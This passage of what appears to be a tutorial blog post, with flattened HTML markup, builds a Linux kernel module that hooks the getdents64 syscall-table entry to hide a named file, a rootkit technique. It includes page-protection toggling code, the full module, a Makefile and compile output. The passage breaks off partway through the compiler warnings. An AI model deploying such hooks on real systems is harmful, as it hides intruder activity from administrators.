class="code-line"span/spancodespan class="k"typedef/spanspan class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"long/spanspan class="w" /spanspan class="n"pteval_t/spanspan class="p";/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pSo basically this is a structure of 1 member of type codeunsigned long/code. The question now becomes how do we manipulate this to make the section of memory writable./p pAfter more grepping through the kernel source it appears the answer to our questions is in codearch/x86/include/asm/pgtable_types.h/code, here is an excerpt:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="cp"#define _PAGE_BIT_PRESENT 0 /spanspan class="cm"/* is present *//spanspan class="cp"/span/span span class="code-line"span class="cp"#define _PAGE_BIT_RW 1 /spanspan class="cm"/* writeable *//spanspan class="cp"/span/span span class="code-line"span class="cp"#define _PAGE_BIT_USER 2 /spanspan class="cm"/* userspace addressable *//spanspan class="cp"/span/span span class="code-line"span class="cp"#define _PAGE_BIT_PWT 3 /spanspan class="cm"/* page write through *//spanspan class="cp"/span/span span class="code-line"span class="cp"#define _PAGE_BIT_PCD 4 /spanspan class="cm"/* page cache disabled *//spanspan class="cp"/span/span span class="code-line"span class="cp"#define _PAGE_BIT_ACCESSED 5 /spanspan class="cm"/* was accessed (raised by CPU) *//spanspan class="cp"/span/span span class="code-line"span class="cp"#define _PAGE_BIT_DIRTY 6 /spanspan class="cm"/* was written to (raised by CPU) *//spanspan class="cp"/span/span span class="code-line"span class="cp"#define _PAGE_BIT_PSE 7 /spanspan class="cm"/* 4 MB (or 2MB) page *//spanspan class="cp"/span/span span class="code-line"span class="cp"#define _PAGE_BIT_PAT 7 /spanspan class="cm"/* on 4KB pages *//spanspan class="cp"/span/span span class="code-line"span class="cp"#define _PAGE_BIT_GLOBAL 8 /spanspan class="cm"/* Global TLB entry PPro+ *//spanspan class="cp"/span/span span class="code-line"span class="cp"#define _PAGE_BIT_UNUSED1 9 /spanspan class="cm"/* available for programmer *//spanspan class="cp"/span/span span class="code-line"span class="cp"#define _PAGE_BIT_IOMAP 10 /spanspan class="cm"/* flag used to indicate IO mapping *//spanspan class="cp"/span/span span class="code-line"span class="cp"#define _PAGE_BIT_HIDDEN 11 /spanspan class="cm"/* hidden by kmemcheck *//spanspan class="cp"/span/span span class="code-line"span class="cp"#define _PAGE_BIT_PAT_LARGE 12 /spanspan class="cm"/* On 2MB or 1GB pages *//spanspan class="cp"/span/span span class="code-line"span class="cp"#define _PAGE_BIT_SPECIAL _PAGE_BIT_UNUSED1/span/span span class="code-line"span class="cp"#define _PAGE_BIT_CPA_TEST _PAGE_BIT_UNUSED1/span/span span class="code-line"span class="cp"#define _PAGE_BIT_SPLITTING _PAGE_BIT_UNUSED1 /spanspan class="cm"/* only valid on a PSE pmd *//spanspan class="cp"/span/span span class="code-line"span class="cp"#define _PAGE_BIT_NX 63 /spanspan class="cm"/* No execute: only valid after cpuid check *//spanspan class="cp"/span/span span class="code-line"span class="p".../spanspan class="w"/span/span span class="code-line"span class="cp"#define _PAGE_PRESENT (_AT(pteval_t, 1) lt;lt; _PAGE_BIT_PRESENT)/span/span span class="code-line"span class="cp"#define _PAGE_RW (_AT(pteval_t, 1) lt;lt; _PAGE_BIT_RW)/span/span span class="code-line"span class="cp"#define _PAGE_USER (_AT(pteval_t, 1) lt;lt; _PAGE_BIT_USER)/span/span span class="code-line"span class="cp"#define _PAGE_PWT (_AT(pteval_t, 1) lt;lt; _PAGE_BIT_PWT)/span/span span class="code-line"span class="cp"#define _PAGE_PCD (_AT(pteval_t, 1) lt;lt; _PAGE_BIT_PCD)/span/span span class="code-line"span class="cp"#define _PAGE_ACCESSED (_AT(pteval_t, 1) lt;lt; _PAGE_BIT_ACCESSED)/span/span span class="code-line"span class="cp"#define _PAGE_DIRTY (_AT(pteval_t, 1) lt;lt; _PAGE_BIT_DIRTY)/span/span span class="code-line"span class="cp"#define _PAGE_PSE (_AT(pteval_t, 1) lt;lt; _PAGE_BIT_PSE)/span/span span class="code-line"span class="cp"#define _PAGE_GLOBAL (_AT(pteval_t, 1) lt;lt; _PAGE_BIT_GLOBAL)/span/span span class="code-line"span class="cp"#define _PAGE_UNUSED1 (_AT(pteval_t, 1) lt;lt; _PAGE_BIT_UNUSED1)/span/span span class="code-line"span class="cp"#define _PAGE_IOMAP (_AT(pteval_t, 1) lt;lt; _PAGE_BIT_IOMAP)/span/span span class="code-line"span class="cp"#define _PAGE_PAT (_AT(pteval_t, 1) lt;lt; _PAGE_BIT_PAT)/span/span span class="code-line"span class="cp"#define _PAGE_PAT_LARGE (_AT(pteval_t, 1) lt;lt; _PAGE_BIT_PAT_LARGE)/span/span span class="code-line"span class="cp"#define _PAGE_SPECIAL (_AT(pteval_t, 1) lt;lt; _PAGE_BIT_SPECIAL)/span/span span class="code-line"span class="cp"#define _PAGE_CPA_TEST (_AT(pteval_t, 1) lt;lt; _PAGE_BIT_CPA_TEST)/span/span span class="code-line"span class="cp"#define _PAGE_SPLITTING (_AT(pteval_t, 1) lt;lt; _PAGE_BIT_SPLITTING)/span/span span class="code-line"/code/pre/div /td/tr/table pAs you can see, the writable bit is 1 and can be referenced with code_PAGE_RW/code./p pUsing this information its easy to write our functions to make memory writable and readonly again:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="kt"int/spanspan class="w" /spanspan class="nf"set_page_rw/spanspan class="p"(/spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"long/spanspan class="w" /spanspan class="n"addr/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"level/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"pte_t/spanspan class="w" /spanspan class="o"*/spanspan class="n"pte/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"lookup_address/spanspan class="p"(/spanspan class="n"addr/spanspan class="p",/spanspan class="w" /spanspan class="o"amp;/spanspan class="n"level/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"pte/spanspan class="o"-gt;/spanspan class="n"pte/spanspan class="w" /spanspan class="o"amp;~/spanspan class="w" /spanspan class="n"_PAGE_RW/spanspan class="p")/spanspan class="w" /spanspan class="n"pte/spanspan class="o"-gt;/spanspan class="n"pte/spanspan class="w" /spanspan class="o"|=/spanspan class="w" /spanspan class="n"_PAGE_RW/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"set_page_ro/spanspan class="p"(/spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"long/spanspan class="w" /spanspan class="n"addr/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"level/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"pte_t/spanspan class="w" /spanspan class="o"*/spanspan class="n"pte/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"lookup_address/spanspan class="p"(/spanspan class="n"addr/spanspan class="p",/spanspan class="w" /spanspan class="o"amp;/spanspan class="n"level/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"pte/spanspan class="o"-gt;/spanspan class="n"pte/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"pte/spanspan class="o"-gt;/spanspan class="n"pte/spanspan class="w" /spanspan class="o"amp;~/spanspan class="n"_PAGE_RW/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table h2Putting It All Together/h2 pNow we have enough information to build our LKM:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/span span class="code-line"span class="normal"50/span/span span class="code-line"span class="normal"51/span/span span class="code-line"span class="normal"52/span/span span class="code-line"span class="normal"53/span/span span class="code-line"span class="normal"54/span/span span class="code-line"span class="normal"55/span/span span class="code-line"span class="normal"56/span/span span class="code-line"span class="normal"57/span/span span class="code-line"span class="normal"58/span/span span class="code-line"span class="normal"59/span/span span class="code-line"span class="normal"60/span/span span class="code-line"span class="normal"61/span/span span class="code-line"span class="normal"62/span/span span class="code-line"span class="normal"63/span/span span class="code-line"span class="normal"64/span/span span class="code-line"span class="normal"65/span/span span class="code-line"span class="normal"66/span/span span class="code-line"span class="normal"67/span/span span class="code-line"span class="normal"68/span/span span class="code-line"span class="normal"69/span/span span class="code-line"span class="normal"70/span/span span class="code-line"span class="normal"71/span/span span class="code-line"span class="normal"72/span/span span class="code-line"span class="normal"73/span/span span class="code-line"span class="normal"74/span/span span class="code-line"span class="normal"75/span/span span class="code-line"span class="normal"76/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;linux/module.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;linux/init.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;linux/kernel.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;linux/moduleparam.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;linux/unistd.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;linux/semaphore.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;linux/dirent.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;asm/cacheflush.hgt;/spanspan class="cp"/span/span span class="code-line"/span span class="code-line"span class="n"MODULE_AUTHOR/spanspan class="p"(/spanspan class="s"quot;0xe7, 0x1equot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="n"MODULE_DESCRIPTION/spanspan class="p"(/spanspan class="s"quot;Hide a file from getdents syscallsquot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="n"MODULE_LICENSE/spanspan class="p"(/spanspan class="s"quot;GPLquot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="o"**/spanspan class="n"sys_call_table/spanspan class="p";/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="cp"#define FILE_NAME quot;thisisatestfile.txtquot;/span/span span class="code-line"/span span class="code-line"span class="n"asmlinkage/spanspan class="w" /spanspan class="nf"int/spanspan class="w" /spanspan class="p"(/spanspan class="o"*/spanspan class="n"original_getdents64/spanspan class="p")/spanspan class="w" /spanspan class="p"(/spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"fd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/span span class="nc"linux_dirent64/spanspan class="w" /spanspan class="o"*/spanspan class="n"dirp/spanspan class="p",/spanspan class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"count/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="n"asmlinkage/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"sys_getdents64_hook/spanspan class="p"(/spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"fd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/span span class="nc"linux_dirent64/spanspan class="w" /spanspan class="o"*/spanspan class="n"dirp/spanspan class="p",/spanspan class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"count/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"rtn/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"struct/span span class="nc"linux_dirent64/spanspan class="w" /spanspan class="o"*/spanspan class="n"cur/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"dirp/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"i/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"rtn/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"original_getdents64/spanspan class="p"(/spanspan class="n"fd/spanspan class="p",/spanspan class="w" /spanspan class="n"dirp/spanspan class="p",/spanspan class="w" /spanspan class="n"count/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"while/spanspan class="w" /spanspan class="p"(/spanspan class="n"i/spanspan class="w" /spanspan class="o"lt;/spanspan class="w" /spanspan class="n"rtn/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"strncmp/spanspan class="p"(/spanspan class="n"cur/spanspan class="o"-gt;/spanspan class="n"d_name/spanspan class="p",/spanspan class="w" /spanspan class="n"FILE_NAME/spanspan class="p",/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"FILE_NAME/spanspan class="p"))/spanspan class="w" /spanspan class="o"==/spanspan class="w" /spanspan class="mi"0/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"reclen/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"cur/spanspan class="o"-gt;/spanspan class="n"d_reclen/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"next_rec/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="n"cur/spanspan class="w" /spanspan class="o"+/spanspan class="w" /spanspan class="n"reclen/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"len/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="p"(/spanspan class="kt"int/spanspan class="p")/spanspan class="n"dirp/spanspan class="w" /spanspan class="o"+/spanspan class="w" /spanspan class="n"rtn/spanspan class="w" /spanspan class="o"-/spanspan class="w" /spanspan class="p"(/spanspan class="kt"int/spanspan class="p")/spanspan class="n"next_rec/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"memmove/spanspan class="p"(/spanspan class="n"cur/spanspan class="p",/spanspan class="w" /spanspan class="n"next_rec/spanspan class="p",/spanspan class="w" /spanspan class="n"len/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"rtn/spanspan class="w" /spanspan class="o"-=/spanspan class="w" /spanspan class="n"reclen/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"continue/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"i/spanspan class="w" /spanspan class="o"+=/spanspan class="w" /spanspan class="n"cur/spanspan class="o"-gt;/spanspan class="n"d_reclen/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"cur/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="p"(/spanspan class="k"struct/span span class="nc"linux_dirent/spanspan class="o"*/spanspan class="p")/spanspan class="w" /spanspan class="p"((/spanspan class="kt"char/spanspan class="o"*/spanspan class="p")/spanspan class="n"dirp/spanspan class="w" /spanspan class="o"+/spanspan class="w" /spanspan class="n"i/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="n"rtn/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="n"set_page_rw/spanspan class="p"(/spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"long/spanspan class="w" /spanspan class="n"addr/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"level/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"pte_t/spanspan class="w" /spanspan class="o"*/spanspan class="n"pte/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"lookup_address/spanspan class="p"(/spanspan class="n"addr/spanspan class="p",/spanspan class="w" /spanspan class="o"amp;/spanspan class="n"level/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"pte/spanspan class="o"-gt;/spanspan class="n"pte/spanspan class="w" /spanspan class="o"amp;~/spanspan class="w" /spanspan class="n"_PAGE_RW/spanspan class="p")/spanspan class="w" /spanspan class="n"pte/spanspan class="o"-gt;/spanspan class="n"pte/spanspan class="w" /spanspan class="o"|=/spanspan class="w" /spanspan class="n"_PAGE_RW/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="n"set_page_ro/spanspan class="p"(/spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"long/spanspan class="w" /spanspan class="n"addr/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"level/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"pte_t/spanspan class="w" /spanspan class="o"*/spanspan class="n"pte/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"lookup_address/spanspan class="p"(/spanspan class="n"addr/spanspan class="p",/spanspan class="w" /spanspan class="o"amp;/spanspan class="n"level/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"pte/spanspan class="o"-gt;/spanspan class="n"pte/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"pte/spanspan class="o"-gt;/spanspan class="n"pte/spanspan class="w" /spanspan class="o"amp;~/spanspan class="n"_PAGE_RW/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="k"static/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"__init/spanspan class="w" /spanspan class="n"getdents_hook_init/spanspan class="p"(/spanspan class="kt"void/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"sys_call_table/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="p"(/spanspan class="kt"void/spanspan class="o"*/spanspan class="p")/spanspan class="mh"0xc1454100/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"original_getdents64/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"sys_call_table/spanspan class="p"[/spanspan class="n"__NR_getdents64/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"set_page_rw/spanspan class="p"(/spanspan class="n"sys_call_table/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sys_call_table/spanspan class="p"[/spanspan class="n"__NR_getdents64/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"sys_getdents64_hook/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="k"static/spanspan class="w" /spanspan class="kt"void/spanspan class="w" /spanspan class="n"__exit/spanspan class="w" /spanspan class="n"getdents_hook_exit/spanspan class="p"(/spanspan class="kt"void/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sys_call_table/spanspan class="p"[/spanspan class="n"__NR_getdents64/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"original_getdents64/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"set_page_ro/spanspan class="p"(/spanspan class="n"sys_call_table/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="n"module_init/spanspan class="p"(/spanspan class="n"getdents_hook_init/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="n"module_exit/spanspan class="p"(/spanspan class="n"getdents_hook_exit/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pI've set the static constant codeFILE_NAME/code to codethisisatestfile.txt/code. Now to edit the codeMakefile/code:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/span span class="code-line"span class="normal"8/span/span span class="code-line"span class="normal"9/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="nv"obj-m/span span class="o"+=/span hello.o/span span class="code-line"span class="nv"obj-m/span span class="o"+=/span reverse.o/span span class="code-line"span class="nv"obj-m/span span class="o"+=/span hidefile.o/span span class="code-line"/span span class="code-line"span class="nf"all/spanspan class="o":/span/span span class="code-line" make -C /lib/modules/span class="k"$(/spanshell uname -rspan class="k")/span/build span class="nv"M/spanspan class="o"=/spanspan class="k"$(/spanPWDspan class="k")/span modules/span span class="code-line"/span span class="code-line"span class="nf"clean/spanspan class="o":/span/span span class="code-line" make -C /lib/modules/span class="k"$(/spanshell uname -rspan class="k")/span/build span class="nv"M/spanspan class="o"=/spanspan class="k"$(/spanPWDspan class="k")/span clean/span span class="code-line"/code/pre/div /td/tr/table pNow to compile and test:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~/lkms# /spanmake/span span class="code-line"span class="go"make -C /lib/modules/3.14-kali1-686-pae/build M=/root/lkms modules/span/span span class="code-line"span class="go"make[1]: Entering directory `/usr/src/linux-headers-3.14-kali1-686-pae#39;/span/span span class="code-line"span class="go" CC [M] /root/lkms/hidefile.o/span/span span class="code-line"span class="go"/root/lkms/hidefile.c: In function ‘sys_getdents64_hook’:/span/span span class="code-line"span class="go"/root/lkms/hidefile.c:36:21: warning: assignment from incompatible pointer type [enabled by default]/span/span span class="code-line"span class="go"/root/lkms/hidefile.c: In function ‘getdents_hook_init’:/span/span span class="code-line"span class="go"/root/lkms/hidefile.c:63:2: warning: passing argument 1 of ‘set_page_rw’ makes integer from pointer without a cast [enabled by default]/span/span span class="code-line"span class="go"/root/lkms/hidefile.c:41:5: note: expected ‘long unsigned int’ but argument is of type ‘void **’/span/span span class="code-line"span class="go"/root/lkms/hidefile.c: In function ‘getdents_hook_exit’:/span/span span class="code-line"span 